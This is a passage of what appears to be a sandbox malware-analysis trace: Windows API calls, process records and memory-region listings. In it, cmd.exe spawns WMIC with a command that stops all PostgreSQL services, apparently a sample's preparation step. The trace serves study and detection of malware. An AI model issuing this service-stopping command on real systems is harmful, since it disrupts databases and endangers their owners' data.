fInfoLevelId=0x1, lpFindFileData=0x50ef180, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x50ef180) returned 0x52eb248 [0107.913] FindClose (in: hFindFile=0x52eb248 | out: hFindFile=0x52eb248) returned 1 [0107.914] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0107.914] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0107.914] GetConsoleTitleW (in: lpConsoleTitle=0x50ef674, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0107.914] InitializeProcThreadAttributeList (in: lpAttributeList=0x50ef5a0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x50ef584 | out: lpAttributeList=0x50ef5a0, lpSize=0x50ef584) returned 1 [0107.914] UpdateProcThreadAttribute (in: lpAttributeList=0x50ef5a0, dwFlags=0x0, Attribute=0x60001, lpValue=0x50ef58c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x50ef5a0, lpPreviousValue=0x0) returned 1 [0107.914] GetStartupInfoW (in: lpStartupInfo=0x50ef5d8 | out: lpStartupInfo=0x50ef5d8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0107.914] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0107.914] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0107.914] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0107.914] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0107.914] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0107.914] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0107.914] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0107.914] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0107.914] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0107.914] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0107.914] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0107.914] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0107.914] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0107.914] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0107.914] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0107.914] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0107.914] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0107.914] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0107.914] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0107.914] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0107.914] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0107.914] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0107.914] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0107.914] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0107.914] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0107.914] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0107.915] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0107.915] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0107.915] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0107.915] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0107.915] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0107.915] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0107.915] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0107.915] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0107.915] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0107.915] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0107.915] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0107.915] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0107.915] lstrcmpW (lpString1="\\WMIC.exe", lpString2="\\XCOPY.EXE") returned -1 [0107.916] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\Wbem\\WMIC.exe", lpCommandLine="WMIC SERVICE WHERE 'caption LIKE '%postgresql%'' CALL STOPSERVICE", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x50ef528*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="WMIC SERVICE WHERE 'caption LIKE '%postgresql%'' CALL STOPSERVICE", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x50ef574 | out: lpCommandLine="WMIC SERVICE WHERE 'caption LIKE '%postgresql%'' CALL STOPSERVICE", lpProcessInformation=0x50ef574*(hProcess=0xa8, hThread=0xa4, dwProcessId=0xd6c, dwThreadId=0xd70)) returned 1 [0107.922] CloseHandle (hObject=0xa4) returned 1 [0107.922] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0107.922] GetEnvironmentStringsW () returned 0x52e9f48* [0107.922] FreeEnvironmentStringsA (penv="=") returned 1 [0107.922] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0109.125] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x50ef50c | out: lpExitCode=0x50ef50c*=0x0) returned 1 [0109.126] CloseHandle (hObject=0xa8) returned 1 [0109.126] _vsnwprintf (in: _Buffer=0x50ef5f4, _BufferCount=0x13, _Format="%08X", _ArgList=0x50ef514 | out: _Buffer="00000000") returned 8 [0109.126] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0109.126] GetEnvironmentStringsW () returned 0x52e7de0* [0109.126] FreeEnvironmentStringsA (penv="=") returned 1 [0109.126] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0109.126] GetEnvironmentStringsW () returned 0x52e7de0* [0109.126] FreeEnvironmentStringsA (penv="=") returned 1 [0109.126] DeleteProcThreadAttributeList (in: lpAttributeList=0x50ef5a0 | out: lpAttributeList=0x50ef5a0) [0109.126] _get_osfhandle (_FileHandle=1) returned 0x3c [0109.126] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0109.127] _get_osfhandle (_FileHandle=1) returned 0x3c [0109.127] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0109.127] _get_osfhandle (_FileHandle=0) returned 0x38 [0109.127] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0109.127] SetConsoleInputExeNameW () returned 0x1 [0109.127] GetConsoleOutputCP () returned 0x1b5 [0109.127] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0109.127] SetThreadUILanguage (LangId=0x0) returned 0x409 [0109.128] exit (_Code=0) Thread: id = 185 os_tid = 0xd68 Process: id = "35" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x45657000" os_pid = "0xd58" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "34" os_parent_pid = "0xd50" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2299 start_va = 0x7f39d000 end_va = 0x7f39dfff entry_point = 0x0 region_type = private name = "private_0x000000007f39d000" filename = "" Region: id = 2300 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2301 start_va = 0x6ac3950000 end_va = 0x6ac396ffff entry_point = 0x0 region_type = private name = "private_0x0000006ac3950000" filename = "" Region: id = 2302 start_va = 0x6ac3970000 end_va = 0x6ac3983fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000006ac3970000" filename = "" Region: id = 2303 start_va = 0x6ac3990000 end_va = 0x6ac39cffff entry_point = 0x0 region_type = private name = "private_0x0000006ac3990000" filename = "" Region: id = 2304 start_va = 0x7df5ff6f0000 end_va = 0x7ff5ff6effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff6f0000" filename = "" Region: id = 2305 start_va = 0x7ff6c4310000 end_va = 0x7ff6c4332fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4310000" filename = "" Region: id = 2306 start_va = 0x7ff6c4335000 end_va = 0x7ff6c4335fff entry_point = 0x0 region_type = private name = "private_0x00007ff6c4335000" filename = "" Region: id = 2307 start_va = 0x7ff6c433e000 end_va = 0x7ff6c433ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c433e000" filename = "" Region: id = 2308 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 2309 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2310 start_va = 0x6ac3ad0000 end_va = 0x6ac3bcffff entry_point = 0x0 region_type = private name = "private_0x0000006ac3ad0000" filename = "" Region: id = 2311 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2312 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2313 start_va = 0x6ac3950000 end_va = 0x6ac395ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000006ac3950000" filename = "" Region: id = 2314 start_va = 0x6ac3960000 end_va = 0x6ac3966fff entry_point = 0x0 region_type = private name = "private_0x0000006ac3960000" filename = "" Region: id = 2315 start_va = 0x6ac39d0000 end_va = 0x6ac3a8dfff entry_point = 0x6ac39d0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2316 start_va = 0x6ac3a90000 end_va = 0x6ac3acffff entry_point = 0x0 region_type = private name = "private_0x0000006ac3a90000" filename = "" Region: id = 2317 start_va = 0x6ac3bd0000 end_va = 0x6ac3bd0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000006ac3bd0000" filename = "" Region: id = 2318 start_va = 0x6ac3be0000 end_va = 0x6ac3be6fff entry_point = 0x0 region_type = private name = "private_0x0000006ac3be0000" filename = "" Region: id = 2319 start_va = 0x6ac3bf0000 end_va = 0x6ac3bf0fff entry_point = 0x0 region_type = private name = "private_0x0000006ac3bf0000" filename = "" Region: id = 2320 start_va = 0x6ac3c00000 end_va = 0x6ac3c00fff entry_point = 0x0 region_type = private name = "private_0x0000006ac3c00000" filename = "" Region: id = 2321 start_va = 0x6ac3ca0000 end_va = 0x6ac3caffff entry_point = 0x0 region_type = private name = "private_0x0000006ac3ca0000" filename = "" Region: id = 2322 start_va = 0x6ac3cb0000 end_va = 0x6ac3e37fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000006ac3cb0000" filename = "" Region: id = 2323 start_va = 0x6ac3e40000 end_va = 0x6ac3fc0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000006ac3e40000" filename = "" Region: id = 2324 start_va = 0x6ac3fd0000 end_va = 0x6ac53cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000006ac3fd0000" filename = "" Region: id = 2325 start_va = 0x7ff6c4210000 end_va = 0x7ff6c430ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4210000" filename = "" Region: id = 2326 start_va = 0x7ff6c433c000 end_va = 0x7ff6c433dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c433c000" filename = "" Region: id = 2327 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 2328 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 2329 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2330 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 2331 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2332 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2333 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2334 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2335 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2336 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2337 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2338 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Thread: id = 182 os_tid = 0xd5c Thread: id = 183 os_tid = 0xd60 Thread: id = 184 os_tid = 0xd64 Process: id = "36" image_name = "wmic.exe" filename = "c:\\windows\\syswow64\\wbem\\wmic.exe" page_root = "0x44917000" os_pid = "0xd6c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "34" os_parent_pid = "0xd50" cmd_line = "WMIC SERVICE WHERE 'caption LIKE '%postgresql%'' CALL STOPSERVICE" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2352 start_va = 0xc80000 end_va = 0xc9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c80000" filename = "" Region: id = 2353 start_va = 0xca0000 end_va = 0xca1fff entry_point = 0x0 region_type = private name = "private_0x0000000000ca0000" filename = "" Region: id = 2354 start_va = 0xcb0000 end_va = 0xcc3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000cb0000" filename = "" Region: id = 2355 start_va = 0xcd0000 end_va = 0xd0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000cd0000" filename = "" Region: id = 2356 start_va = 0xd10000 end_va = 0xd4ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d10000" filename = "" Region: id = 2357 start_va = 0xd50000 end_va = 0xd53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d50000" filename = "" Region: id = 2358 start_va = 0xd60000 end_va = 0xd60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d60000" filename = "" Region: id = 2359 start_va = 0xd70000 end_va = 0xd71fff entry_point = 0x0 region_type = private name = "private_0x0000000000d70000" filename = "" Region: id = 2360 start_va = 0x1300000 end_va = 0x1363fff entry_point = 0x1300000 region_type = mapped_file name = "wmic.exe" filename = "\\Windows\\SysWOW64\\wbem\\WMIC.exe" (normalized: "c:\\windows\\syswow64\\wbem\\wmic.exe") Region: id = 2361 start_va = 0x1370000 end_va = 0x536ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001370000" filename = "" Region: id = 2362 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2363 start_va = 0x7ee70000 end_va = 0x7ee92fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ee70000" filename = "" Region: id = 2364 start_va = 0x7ee9a000 end_va = 0x7ee9cfff entry_point = 0x0 region_type = private name = "private_0x000000007ee9a000" filename = "" Region: id = 2365 start_va = 0x7ee9d000 end_va = 0x7ee9dfff entry_point = 0x0 region_type = private name = "private_0x000000007ee9d000" filename = "" Region: id = 2366 start_va = 0x7ee9f000 end_va = 0x7ee9ffff entry_point = 0x0 region_type = private name = "private_0x000000007ee9f000" filename = "" Region: id = 2367 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2368 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2369 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 2370 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2371 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 2372 start_va = 0xda0000 end_va = 0xdaffff entry_point = 0x0 region_type = private name = "private_0x0000000000da0000" filename = "" Region: id = 2373 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2374 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2375 start_va = 0xe20000 end_va = 0xf1ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e20000" filename = "" Region: id = 2376 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2377 start_va = 0xc80000 end_va = 0xc8ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c80000" filename = "" Region: id = 2378 start_va = 0xc90000 end_va = 0xc93fff entry_point = 0x0 region_type = private name = "private_0x0000000000c90000" filename = "" Region: id = 2379 start_va = 0xdb0000 end_va = 0xdeffff entry_point = 0x0 region_type = private name = "private_0x0000000000db0000" filename = "" Region: id = 2380 start_va = 0xf20000 end_va = 0xfddfff entry_point = 0xf20000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2381 start_va = 0xfe0000 end_va = 0x101ffff entry_point = 0x0 region_type = private name = "private_0x0000000000fe0000" filename = "" Region: id = 2382 start_va = 0x1150000 end_va = 0x115ffff entry_point = 0x0 region_type = private name = "private_0x0000000001150000" filename = "" Region: id = 2383 start_va = 0x74a30000 end_va = 0x74a6efff entry_point = 0x74a30000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\SysWOW64\\framedynos.dll" (normalized: "c:\\windows\\syswow64\\framedynos.dll") Region: id = 2384 start_va = 0x74b60000 end_va = 0x74b67fff entry_point = 0x74b60000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 2385 start_va = 0x74b70000 end_va = 0x74b9ffff entry_point = 0x74b70000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 2386 start_va = 0x74ce0000 end_va = 0x74d38fff entry_point = 0x74ce0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 2387 start_va = 0x74d40000 end_va = 0x74d49fff entry_point = 0x74d40000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2388 start_va = 0x74d50000 end_va = 0x74d6dfff entry_point = 0x74d50000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2389 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2390 start_va = 0x77090000 end_va = 0x77249fff entry_point = 0x77090000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 2391 start_va = 0x77250000 end_va = 0x77292fff entry_point = 0x77250000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2392 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2393 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2394 start_va = 0x77ad0000 end_va = 0x77ad6fff entry_point = 0x77ad0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 2395 start_va = 0x77af0000 end_va = 0x77b9bfff entry_point = 0x77af0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2396 start_va = 0x7ed70000 end_va = 0x7ee6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ed70000" filename = "" Region: id = 2397 start_va = 0x7ee97000 end_va = 0x7ee99fff entry_point = 0x0 region_type = private name = "private_0x000000007ee97000" filename = "" Region: id = 2398 start_va = 0x76f60000 end_va = 0x76f6bfff entry_point = 0x76f60000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 2399 start_va = 0xca0000 end_va = 0xca0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ca0000" filename = "" Region: id = 2400 start_va = 0x77760000 end_va = 0x777e1fff entry_point = 0x77760000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 2401 start_va = 0xd80000 end_va = 0xd80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d80000" filename = "" Region: id = 2402 start_va = 0x74a20000 end_va = 0x74a2cfff entry_point = 0x74a20000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 2403 start_va = 0x77930000 end_va = 0x7798bfff entry_point = 0x77930000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 2404 start_va = 0x749b0000 end_va = 0x74a15fff entry_point = 0x749b0000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 2405 start_va = 0x74af0000 end_va = 0x74b0afff entry_point = 0x74af0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 2406 start_va = 0x5370000 end_va = 0x56a6fff entry_point = 0x5370000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2407 start_va = 0x77ba0000 end_va = 0x77c31fff entry_point = 0x77ba0000 region_type = mapped_file name = "oleaut32.dll" filename = 